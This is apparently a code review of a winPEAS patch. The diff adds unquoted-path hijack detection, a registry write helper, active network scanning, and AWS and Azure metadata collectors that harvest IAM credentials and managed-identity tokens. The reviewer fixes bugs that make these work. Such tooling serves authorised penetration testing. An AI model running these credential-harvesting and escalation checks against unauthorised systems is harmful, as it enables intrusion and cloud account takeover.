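Review bot: `catch (Exception ex) { }` now swallows failures of the new `WSLHelper.TryGetRootUser` call along with everything else, and `ex` is never used; at minimum surface it in debug mode, `catch (Exception ex) { Beaprint.PrintDebugLine($"WSL distribution {wslKey}: {ex.Message}"); }`. The name `TryGetRootUser`, together with the `RegistryHelper.WriteRegValue` this same patch introduces, suggests the helper may rewrite the distribution's default user in the registry; WSLHelper.cs is not in this chunk, so that is inferred, but if it does write, that is a persistent change to the target that an enumeration run should make opt-in and state in its output.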
@@ -36,11 +36,14 @@ namespace winPEAS.Checks { "Possible DLL Hijacking.*", Beaprint.ansi_color_bad }, }; - if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"])) + // we need to find first occurrence of the procinfo name + string processNameSanitized = procInfo["Name"].Trim().ToLower(); + + if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized)) { - if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]])) + if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0) { - procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]]; + procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]); } colorsP[procInfo["Product"]] = Beaprint.ansi_color_good; } diff --git a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs index ab046f5..d8950b0 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs @@ -387,8 +387,7 @@ namespace winPEAS.Checks static void PrintCachedCreds() { - try - { + try{ Beaprint.MainPrint("Cached Creds"); Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user"); string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT"); diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs index ce11f8d..8cbc17e 100644 --- a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs +++ b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs 
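Review bot: `procInfo["Name"].Trim().ToLower()` is culture-sensitive; under a Turkish locale an `I` lowercases to dotless `ı`, and the key then misses `AVVendorsByProcess` even though the same name is in the table. Use `ToLowerInvariant()` (or give the dictionary `StringComparer.OrdinalIgnoreCase` and drop the lowercasing), and collapse the `ContainsKey` plus two indexer lookups into one: `if (DefensiveProcesses.AVVendorsByProcess.TryGetValue(processNameSanitized, out var vendors) )` with `vendors.Count > 0` below it. `AVVendorsByProcess` is defined in DefensiveProcesses.cs, which is not in this chunk, so its comparer is assumed.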
@@ -81,6 +81,7 @@ namespace winPEAS.Helpers /---------------------------------------------------------------------------------\ | {1}Do you like PEASS?{0} | |---------------------------------------------------------------------------------| + | {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} | | {3}Follow on Twitter{0} : {2}@hacktricks_live{0} | | {3}Respect on HTB{0} : {2}SirBroccoli {0} | |---------------------------------------------------------------------------------| @@ -132,6 +133,7 @@ namespace winPEAS.Helpers Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR); Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR); Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR); + Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR); Console.WriteLine(); Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR); Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR); 
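Review bot: The new banner row is labelled `Get the latest version` but links to `https://github.com/sponsors/carlospolop`, a sponsorship page rather than a release; either relabel it `Sponsor the project` or point it at the releases page (`Checks.LinpeasUrl` elsewhere in this patch already uses `github.com/carlospolop/PEASS-ng/releases`). A mismatched label in a banner that operators copy into reports is the kind of thing that gets questioned.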
@@ -146,6 +148,11 @@ namespace winPEAS.Helpers Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR); Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" + $" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR); + Console.WriteLine(LCYAN + " -network" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" + + $" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" + + $" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" + + $" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" + + $" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR); } @@ -290,8 +297,7 @@ namespace winPEAS.Helpers string value = entry.Value; string key = entry.Key; - string line = ""; - + string line; if (!no_gray) { line = ansi_color_gray + " " + key + ": " + NOCOLOR + value; diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs b/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs index a905c08..c183446 100644 --- a/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs +++ b/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs 
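Review bot: The `-network` help does not say that the option is active scanning: judging by the NetPinger/PortScanner files this patch adds, it probes every host it finds and connects to up to 1000 TCP ports on each, which is noisy, readily flagged by IDS/EDR, and outside the scope of most local-privesc engagements. Add a line such as `(active scan: generates ping and TCP connect traffic to every host found - make sure it is in scope)`. It should also state that `-ports` only takes effect when it follows `-network` on the command line, since the parser in Checks.cs rejects it otherwise.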
@@ -122,6 +122,51 @@ namespace winPEAS.Helpers return binaryPath; } + public static bool CheckQuoteAndSpaceWithPermissions(string path, out List injectablePaths) + { + List result = new List(); + bool isInjectable = false; + + if (!path.Contains('"') && !path.Contains("'")) + { + if (path.Contains(" ")) + { + string currentPath = string.Empty; + foreach (var pathPart in Regex.Split(path, @"\s")) + { + currentPath += pathPart + " "; + + if (File.Exists(currentPath) || Directory.Exists(currentPath)) + { + var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT); + + if (permissions.Any()) + { + result.Add(currentPath); + isInjectable = true; + } + } + else + { + var firstPathPart = currentPath; + DirectoryInfo di = new DirectoryInfo(firstPathPart); + var exploitablePath = di.Parent.FullName; + var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT); + + if (folderPermissions.Any()) + { + result.Add(exploitablePath); + isInjectable = true; + }; + } + } + } + } + + injectablePaths = result.Select(i => i).Distinct().ToList(); + return isInjectable; + } + public static bool CheckQuoteAndSpace(string path) { if (!path.Contains('"') && !path.Contains("'")) diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs index 51f0d15..7e76194 100644 --- a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs +++ b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs 
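Review bot: The loop checks the wrong object when a truncated prefix happens to exist: Windows resolves an unquoted path by trying `<prefix>.exe` in the prefix's parent directory (`C:\Program.exe`, `C:\Program Files\My.exe`), so writability of `currentPath` itself in the `File.Exists || Directory.Exists` branch is not what makes the service hijackable, and on the last iteration that branch merely re-tests the binary that `interestingFileRights` already covers. The else branch can also crash: `new DirectoryInfo(...)` throws `ArgumentException` on invalid path characters (a command line with `|`, `<` or `>` after the exe) and `.Parent` is null at a drive root. Checking `Path.GetDirectoryName` of every prefix except the last, inside a guard, fixes both; the permission query and the `result`/`isInjectable` bookkeeping stay as they are. `result.Select(i => i).Distinct()` is just `result.Distinct()`.
```csharp
string currentPath = string.Empty;
string[] pathParts = Regex.Split(path, @"\s");
// Windows tries "<prefix>.exe" for each whitespace-truncated prefix, so the
// injectable location is the prefix's parent directory, never the prefix
// object itself; the last part is the real binary and is checked elsewhere.
for (int i = 0; i < pathParts.Length - 1; i++)
{
    currentPath += pathParts[i] + " ";

    string exploitablePath;
    try
    {
        exploitablePath = Path.GetDirectoryName(currentPath.TrimEnd());
    }
    catch (Exception ex) when (ex is ArgumentException || ex is PathTooLongException)
    {
        continue; // invalid path characters, e.g. redirections in a command line
    }
    if (string.IsNullOrEmpty(exploitablePath))
    {
        continue; // drive root: nothing to check
    }
    // … unchanged: GetPermissionsFolder(exploitablePath, …), result.Add, isInjectable = true …
}
```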
@@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path); } + public static bool WriteRegValue(string hive, string path, string keyName, string value) + { + try + { + RegistryKey regKey; + if (hive == "HKCU") + { + regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path); + } + else if (hive == "HKU") + { + regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path); + + } + else + { + regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path); + } + + if (regKey == null) + { + return false; + } + + regKey.SetValue(keyName, value, RegistryValueKind.String); + } + catch (Exception ex) + { + return false; + } + + return true; + } + public static string GetRegValue(string hive, string path, string value) { // returns a single registry value under the specified path in the specified hive (HKLM/HKCU) diff --git a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs index d064d7d..cd106a2 100644 --- a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs +++ b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs @@ -5,8 +5,10 @@ using System.IO; using System.Linq; using System.Management; using System.Text.RegularExpressions; +using winPEAS.Checks; using winPEAS.Helpers; using winPEAS.Helpers.Registry; +using winPEAS.Helpers.YamlConfig; namespace winPEAS.Info.ApplicationInfo { @@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo { } + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths); + results.Add(new Dictionary() { {"Reg", autorunLocation[0] + "\\" + autorunLocation[1]}, 
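Review bot: `WriteRegValue` can never succeed as written: `OpenSubKey(path)` opens the key read-only, so `regKey.SetValue(...)` throws `UnauthorizedAccessException`, which the catch turns into `return false`; the key must be opened with `OpenSubKey(path, writable: true)`. The `RegistryKey` is also never disposed, and any hive string other than `HKCU`/`HKU` silently falls through to HKLM, so a typo writes to the machine hive. Since this is the first write primitive in an enumeration tool, a summary comment saying where it is used and that it modifies the target would help the next reader (the caller is not in this chunk).
```csharp
public static bool WriteRegValue(string hive, string path, string keyName, string value)
{
    try
    {
        RegistryKey root = hive == "HKCU" ? Microsoft.Win32.Registry.CurrentUser
                         : hive == "HKU"  ? Microsoft.Win32.Registry.Users
                         : Microsoft.Win32.Registry.LocalMachine;

        // OpenSubKey(path) is read-only; SetValue on it throws UnauthorizedAccessException.
        using (RegistryKey regKey = root.OpenSubKey(path, writable: true))
        {
            if (regKey == null)
            {
                return false;
            }

            regKey.SetValue(keyName, value, RegistryValueKind.String);
        }
    }
    catch (Exception ex)
    {
        // … unchanged: return false …
    }

    return true;
}
```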
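Review bot: `var injectablePaths = new List(); var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);` pre-initialises an `out` argument that the callee must overwrite anyway; `var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out var injectablePaths);` says the same in one line. The same two-line pattern recurs in the three later hunks of this file. This hunk's enclosing method starts before it.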
@@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo "interestingFileRights", orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : "" }, - {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()} + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } } @@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", ""); string folder = Path.GetDirectoryName(orig_filepath); + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths); + results.Add(new Dictionary() { {"Reg", autorunLocation[0] + "\\" + reg}, @@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo "interestingFileRights", orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : "" }, - {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()} + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } } @@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE")); usersPath = Directory.GetParent(usersPath).FullName; + var config = YamlConfigHelper.GetWindowsSearchConfig(); + var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value; + // add .* around each element to match the whole line + var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*"); + pwdInsideHistory = string.Join("|", items); + try { if (Directory.Exists(usersPath)) 
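Review bot: `config.variables.FirstOrDefault(...).value` in the `@@ -342` hunk dereferences the lookup result without a null check, so a search config that lacks a `pwd_inside_history` variable (or an entry whose `name` is null, since `v.name.Equals` is called on it) throws before the `try` that follows, aborting the whole startup-folder enumeration; `pwdInsideHistory.Split('|')` would likewise throw on a null value. Guard it, e.g. `var pwdInsideHistory = config?.variables?.FirstOrDefault(v => string.Equals(v.name, "pwd_inside_history", StringComparison.InvariantCultureIgnoreCase))?.value ?? string.Empty;`, and skip the content scan when it is empty — an empty value wrapped as `.*.*` would otherwise match every line of every file. The method this sits in begins outside the hunk.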
@@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo foreach (string filepath in files) { + var fileContent = File.ReadAllText(filepath); + var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false); + // remove all non-printable and control characters + sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList(); + + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths); + string folder = Path.GetDirectoryName(filepath); results.Add(new Dictionary() { { "Reg", "" }, @@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo { "isWritableReg", ""}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))}, - { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() } + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }, + { "sensitiveInfoList", string.Join(", ", sensitiveInfoList) }, }); } } @@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo { try { + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths); + results.Add(new Dictionary() { { "Reg", "" }, { "RegKey", "" }, @@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo { "isWritableReg", ""}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", ""}, - { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() } + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } catch (Exception) 
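Review bot: `File.ReadAllText(filepath)` is the first statement for every file found in the users' Startup folders and, as far as the hunk shows, has no per-file try, so a locked or unreadable file throws out of the `foreach` into the outer `try` visible as context in the previous hunk and the remaining startup entries are never listed; binaries and large files are also read whole and regex-scanned as text. Make the read best-effort and bounded, e.g. `string fileContent = string.Empty; try { if (new FileInfo(filepath).Length < 1024 * 1024) fileContent = File.ReadAllText(filepath); } catch (Exception) { }` (pick the size cap the other content scans in `FileAnalysis` use). `CheckQuoteAndSpaceWithPermissions(filepath, ...)` is also applied to a path returned by `Directory.GetFiles`, which is an on-disk name rather than a command line, so the unquoted-path verdict here presumably carries no meaning and could stay `"false"`.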
@@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo try { string folder = Path.GetDirectoryName(filepathCleaned); + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths); + results.Add(new Dictionary() { {"Reg", ""}, @@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs)) }, - {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()} + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } catch (Exception) @@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo if (File.Exists(path)) { string folder = Path.GetDirectoryName(path); + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths); results.Add(new Dictionary { @@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo { "isWritableReg", ""}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))}, - { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() } + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } } diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs new file mode 100644 index 0000000..71e7bc1 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs 
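Review bot: In the scheduled-task hunk (`@@ -447`) `CheckQuoteAndSpaceWithPermissions(command, ...)` receives the whole command line although the hunk already has the executable isolated as `filepathCleaned`; since the helper splits on every whitespace and checks the parent of each prefix, argument tokens such as `-config C:\x` are treated as further path segments and their parents can be reported as injectable paths. The raw `command` is needed to detect missing quotes, so the cleanest fix is for the helper to stop walking once a prefix resolves to an existing file, or to pass it only the executable portion of the command. Note too that `"isUnquotedSpaced"` used to hold `"True"`/`"False"` and at all five sites now holds either `"false"` (lower-case) or a comma-joined path list; whatever renders this key (ApplicationsInfo.cs is in the diffstat but not visible here) must not compare it against the old boolean strings.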
@@ -0,0 +1,201 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net; +using winPEAS.Helpers; + +namespace winPEAS.Info.CloudInfo +{ + internal class AWSInfo : CloudInfoBase + { + /* + * notes - possible identification: + * + - "c:\Program Files\Amazon\EC2Launch" + - "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe" + - "c:\Program Files (x86)\AWS SDK for .NET" + - get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ" + */ + + const string AWS_FOLDER = "c:\\Program Files\\Amazon\\"; + const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token"; + const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data"; + + + public override string Name => "AWS EC2"; + + private Dictionary> _endpointData = null; + + public override bool IsCloud => Directory.Exists(AWS_FOLDER); + + public override Dictionary> EndpointDataList() + { + if (_endpointData == null) + { + _endpointData = new Dictionary>(); + + try + { + if (IsAvailable) + { + string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } }); + + _endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN)); + _endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN)); + _endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN)); + _endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN)); + _endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN)); + _endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN)); + + /* + * print_3title "SSM Runnig" + ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED}," + * + */ + } + else + { + _endpointData.Add("General Info", new List() + { + new EndpointData() + { + EndpointName = "", + Data = null, + IsAttackVector = false + } + }); + } + } + 
catch (Exception ex) + { + Beaprint.PrintException(ex.Message); + } + } + + return _endpointData; + } + + private List GetSecurityCredentialsMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>() + { + new Tuple("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false), + }; + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetUserDataMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>() + { + new Tuple("user-data", "latest/user-data", false), + }; + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetIAMRoleMetadataInfo(string apiToken) + { + var metadataEndpoints = new List> + { + new Tuple("iam/info", "iam/info", false) + }; + + var url = $"{METADATA_URL_BASE}/iam/security-credentials/"; + var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } }); + + foreach (var role in roles.Split('\n')) + { + metadataEndpoints.Add(new Tuple(role, $"iam/security-credentials/{role}", false)); + } + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetNetworkMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>(); + + var url = $"{METADATA_URL_BASE}/network/interfaces/macs/"; + var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } }); + var urlBase = "network/interfaces/macs"; + + foreach (var mac in macs.Split('\n')) + { + metadataEndpoints.Add(new Tuple("Owner ID", $"{urlBase}/{mac}/owner-id", false)); + metadataEndpoints.Add(new Tuple("Public Hostname", $"{urlBase}/{mac}/public-hostname", false)); + metadataEndpoints.Add(new Tuple("Security Groups", $"{urlBase}/{mac}/security-groups", false)); + metadataEndpoints.Add(new Tuple("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false)); + metadataEndpoints.Add(new 
Tuple("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false)); + metadataEndpoints.Add(new Tuple("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false)); + metadataEndpoints.Add(new Tuple("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false)); + metadataEndpoints.Add(new Tuple("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false)); + } + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetAccountMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>() + { + new Tuple("account info", "identity-credentials/ec2/info", false), + }; + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetGeneralMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>() + { + new Tuple("ami id", "ami-id", false), + new Tuple("instance action","instance-action", false), + new Tuple("instance id","instance-id", false), + new Tuple("instance life-cycle","instance-life-cycle", false), + new Tuple("instance type","instance-type", false), + new Tuple("placement/region","placement/region", false), + }; + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetMetadataInfo(List> endpointData, string apiToken) + { + List _endpointDataList = new List(); + + foreach (var tuple in endpointData) + { + string url = $"{METADATA_URL_BASE}/{tuple.Item2}"; + + var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } }); + + _endpointDataList.Add(new EndpointData() + { + EndpointName = tuple.Item1, + Data = result, + IsAttackVector = tuple.Item3 + }); + } + + return _endpointDataList; + } + + public override bool TestConnection() + { + return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null; + } + } +} 
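Review bot: `GetUserDataMetadataInfo` registers `"latest/user-data"` as a path that `GetMetadataInfo` prefixes with `METADATA_URL_BASE`, so the request goes to `http://169.254.169.254/latest/meta-data/latest/user-data`, which does not exist; EC2 user data is served from `http://169.254.169.254/latest/user-data`, one level above `meta-data`, so this entry will always come back empty. Fetch it directly — `var userData = CreateMetadataAPIRequest("http://169.254.169.254/latest/user-data", "GET", new WebHeaderCollection { { "X-aws-ec2-metadata-token", apiToken } });` — and build the single `EndpointData` for it in place. If the IMDSv2 `PUT` fails (hop limit, proxy), `API_TOKEN` is null or empty and every later request still sends the `X-aws-ec2-metadata-token` header, presumably with an empty value, which I would expect IMDS to reject; only add the header when the token is non-empty so instances with IMDSv1 enabled still answer. Finally, the IAM role and `ec2-instance` security credentials are flagged `IsAttackVector = false` while the Azure implementation marks its tokens `true`; these are live credentials and deserve the same flag.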
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs new file mode 100644 index 0000000..e37f19f --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs 
@@ -0,0 +1,88 @@ +using System.Collections.Generic; +using System.IO; +using System.Net; +using System; + +namespace winPEAS.Info.CloudInfo +{ + internal class AzureInfo : CloudInfoBase + { + public override string Name => "Azure VM"; + public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER); + + private Dictionary> _endpointData = null; + + const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure"; + const string AZURE_BASE_URL = "http://169.254.169.254/metadata/"; + const string API_VERSION = "2021-12-13"; + + public override Dictionary> EndpointDataList() + { + if (_endpointData == null) + { + _endpointData = new Dictionary>(); + List _endpointDataList = new List(); + + try + { + string result; + + List> endpoints = new List>() + { + new Tuple("Instance Details", $"instance?api-version={API_VERSION}", false), + new Tuple("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false), + new Tuple("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true), + new Tuple("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true), + new Tuple("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true), + new Tuple("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true) + }; + + if (IsAvailable) + { + + + foreach (var tuple in endpoints) + { + string url = $"{AZURE_BASE_URL}{tuple.Item2}"; + + result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } }); + + _endpointDataList.Add(new EndpointData() + { + EndpointName = tuple.Item1, + Data = result, + IsAttackVector = tuple.Item3 + }); + } + + + } + else + { + foreach (var endpoint in endpoints) + { + _endpointDataList.Add(new EndpointData() + { + EndpointName = endpoint.Item1, + Data = null, + IsAttackVector = false + }); + } + } + + 
_endpointData.Add("General", _endpointDataList); + } + catch (Exception ex) + { + } + } + + return _endpointData; + } + + public override bool TestConnection() + { + return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null; + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs new file mode 100644 index 0000000..6827f08 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs 
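Review bot: `catch (Exception ex) { }` at the end of `EndpointDataList` swallows every failure silently, unlike the AWS and GCP implementations which call `Beaprint.PrintException(ex.Message)`; an error here leaves `_endpointData` empty with no indication why. Use the same call, `catch (Exception ex) { Beaprint.PrintException(ex.Message); }` (with `using winPEAS.Helpers;`). `TestConnection` also issues a GET to `http://169.254.169.254/metadata/` without the `Metadata: true` header, which Azure IMDS rejects as a bad request; that only counts as "available" because the base class maps any HTTP error status to an empty string, so probe a real endpoint instead: `CreateMetadataAPIRequest($"{AZURE_BASE_URL}instance?api-version={API_VERSION}", "GET", new WebHeaderCollection { { "Metadata", "true" } }) != null`. The four `identity/oauth2/token` entries return live bearer tokens that end up verbatim in the report; a comment on the `endpoints` list saying that the output contains credentials would help whoever has to redact it.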
